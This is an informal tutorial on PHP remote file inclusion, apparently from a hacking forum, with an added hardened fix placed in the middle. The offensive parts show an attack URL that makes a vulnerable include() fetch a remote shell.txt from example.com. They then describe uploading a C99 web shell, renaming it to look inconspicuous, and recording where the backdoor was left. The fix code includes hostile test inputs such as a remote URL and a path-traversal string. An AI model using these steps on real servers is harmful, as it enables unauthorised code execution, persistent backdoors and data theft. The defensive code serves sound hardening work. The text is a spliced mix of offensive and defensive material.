Every hacker dreams of running their own code on a target server or, better yet, having a graphical way of browsing remote files. So let's see how it's done.
PHP is extremely susceptible to this due to the default settings for register_globals and allow_url_fopen being turned on; most admins of PHP sites forget that these options leave their sites exploitable. You may ask "But how do we know if these are set to on?" You'll be able to tell when they're on: if they aren't, the exploit won't work.
Now let's have a look at an example exploit off the top of my head:

<?php
// header and config stuff here
include($_GET['include_path']);
// footer
?>
So if we can manipulate include_path we can redirect it to our arbitrary file, so let's say we punch in

victim.com/test.php?include_path=http://example.com/shell.txt?

This would make the PHP script, test.php, go and fetch our arbitrary script, shell.txt, and include and parse it.
From here we could execute server-side commands as the currently logged-in user, use privilege escalation exploits, and access files located on the server (config files are of particular interest).
The fix

Turn register_globals and allow_url_fopen off in your php.ini.

Or chuck this bit of code in (it was written very quickly lol, so edit where needed):
<?php
// Files allowed:
$allowedFiles = array('config.php', 'other_file.php', 'and_another.php');
if (in_array((string)$_GET['include_path'], $allowedFiles)) {
    include($_GET['include_path']);
} else {
    exit('not allowed');
}
?>
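The allowlist above still hands the raw request value to include() once it passes the check. The following is an added example, not code from the original post, that restates the fix so that user input never becomes a path at all: the URL token is looked up in a fixed map, and anything else is rejected. It also answers the "how do we know if these are set to on?" question from the server's own side by reading the php.ini values. Two caveats a practitioner should know: register_globals was removed in PHP 5.4, and the setting that actually governs include() of a URL is allow_url_include (separate from allow_url_fopen, and off by default), so check that one too. The pages/ directory layout and the token names are assumptions for the example.

```php
<?php
// Added example (not from the original post). Maps a request token to a fixed
// file so the raw query value never reaches include(). Paths are assumed.
declare(strict_types=1);

/** Pages a visitor may ask for, keyed by the token that appears in the URL. */
const ALLOWED_PAGES = [
    'config' => __DIR__ . '/pages/config.php',      // assumed layout
    'other'  => __DIR__ . '/pages/other_file.php',  // assumed layout
    'third'  => __DIR__ . '/pages/and_another.php', // assumed layout
];

/**
 * Resolve the include_path query parameter to a file on disk, or null when it
 * is not one of the allowed tokens. Only the token is looked up; no path is
 * ever built from the raw value, so a URL, "../" sequences or a null byte
 * cannot reach include().
 */
function resolvePage(?string $requested): ?string
{
    if ($requested === null || $requested === '') {
        return null;
    }
    return ALLOWED_PAGES[$requested] ?? null;
}

/** True when the token would be accepted (used by the self-test below). */
function isAllowedPage(?string $requested): bool
{
    return resolvePage($requested) !== null;
}

/**
 * Report the php.ini settings the original text talks about. register_globals
 * no longer exists on PHP >= 5.4, so ini_get() returns false for it there;
 * allow_url_include is the directive that decides whether include() will
 * fetch a URL at all.
 */
function remoteIncludeSettings(): array
{
    $flag = static function (string $name): ?bool {
        $value = ini_get($name);
        return $value === false ? null : filter_var($value, FILTER_VALIDATE_BOOLEAN);
    };
    return [
        'register_globals'  => $flag('register_globals'),  // null = directive gone
        'allow_url_fopen'   => $flag('allow_url_fopen'),
        'allow_url_include' => $flag('allow_url_include'),
    ];
}

// Self-test with constructed inputs, run only from the command line.
if (PHP_SAPI === 'cli') {
    $cases = [
        'config'                       => true,
        'http://example.com/shell.txt' => false,
        '../../../../etc/passwd'       => false,
        "config\0.php"                 => false,
        ''                             => false,
    ];
    foreach ($cases as $input => $expected) {
        $got = isAllowedPage((string)$input);
        printf("%-32s -> %s\n", var_export($input, true), $got ? 'allowed' : 'rejected');
        assert($got === $expected);
    }
    foreach (remoteIncludeSettings() as $name => $on) {
        printf("%-18s = %s\n", $name, $on === null ? 'not present' : ($on ? 'On' : 'Off'));
    }
}

// In the page handler the lookup replaces the original include():
// $page = resolvePage($_GET['include_path'] ?? null);
// if ($page === null) { http_response_code(404); exit('not allowed'); }
// include $page;
```

Running the file with `php` from a shell prints one line per test input and the three ini values; in the handler itself only resolvePage() is needed. The difference from the in_array() version is that include() receives a constant from the map, so nothing a visitor types is ever interpreted as a filename or a URL.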
Another exploitable piece of code:

<?php
/*
** Monster Top List 1.4
** Supplied By: lord
** Nullification By: Zygote
** */
require $root_path . "sources/func_output.php";
$mtl = new TopList;
$mtl->license['domain'] = $domainf;
$mtl->license['date'] = $exp;
$mtl->start_timer();
$mtl->input = $mtl->input();
class TopList
{
    var $make_mail;
    var $time = "";
    var $input = array();
    // ... the rest of the class is not reproduced in this excerpt
}
So we can obviously see here that require $root_path . "sources/func_output.php"; is the piece of code at fault: $root_path is never set before it is used, so with register_globals on it can be supplied from the request.
I upload something a bit prettier, say C99. First we find a folder on the server that the currently logged-on user has read/write permission to. I chose to browse through to victimsite.com/topsites/html/s1/sources/, uploaded c99.php and renamed it to sources.php (looks less conspicuous).

Remember to write down where you left your shell (or another backdoor of your choice).

And there we have it, Remote File Includes in all their glory.
Play Safe!